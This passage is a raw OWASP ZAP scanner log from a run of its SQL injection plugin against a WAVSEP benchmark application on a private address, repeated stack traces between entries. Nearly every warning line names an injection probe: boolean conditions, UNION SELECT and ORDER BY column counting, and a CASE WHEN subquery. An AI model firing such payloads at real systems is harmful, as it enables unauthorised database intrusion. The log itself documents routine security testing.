org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679818 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 2885=9852 AND 'AxbI'='AxbI] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 2885=9852 AND 'AxbI'='AxbI at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679820 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 9722=2908 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 9722=2908 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679820 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679821 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8524=8524 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8524=8524 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679822 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 9722=2908 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 9722=2908 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679822 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679823 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 6678#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 6678# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679824 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1058=3570-- Ztiu] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1058=3570-- Ztiu at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679827 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679828 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7359=7359-- BFXj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7359=7359-- BFXj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679829 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1058=3570-- Ztiu] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1058=3570-- Ztiu at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679830 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679831 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679831 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6639=3188) THEN 6639 ELSE 6639*(SELECT 6639 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (6639=3188) THEN 6639 ELSE 6639*(SELECT 6639 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at 